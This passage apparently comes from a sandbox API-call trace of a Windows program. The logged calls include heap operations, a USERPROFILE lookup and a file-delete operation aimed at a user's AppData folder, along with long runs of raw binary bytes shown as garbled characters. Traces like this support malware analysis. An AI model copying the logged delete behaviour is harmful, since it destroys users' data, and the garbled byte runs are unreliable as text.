㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Application Data", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0154.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0154.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0154.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0154.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0154.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0154.572] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0154.572] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.572] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0154.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0154.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0154.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0154.572] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0154.572] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0154.573] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0154.573] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.573] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0154.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0154.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0154.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0154.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0154.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0154.574] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0154.574] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0154.575] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0154.575] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0154.575] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0154.575] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.575] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0154.576] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a683a8 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0154.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0154.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0154.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0154.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68430 [0154.577] 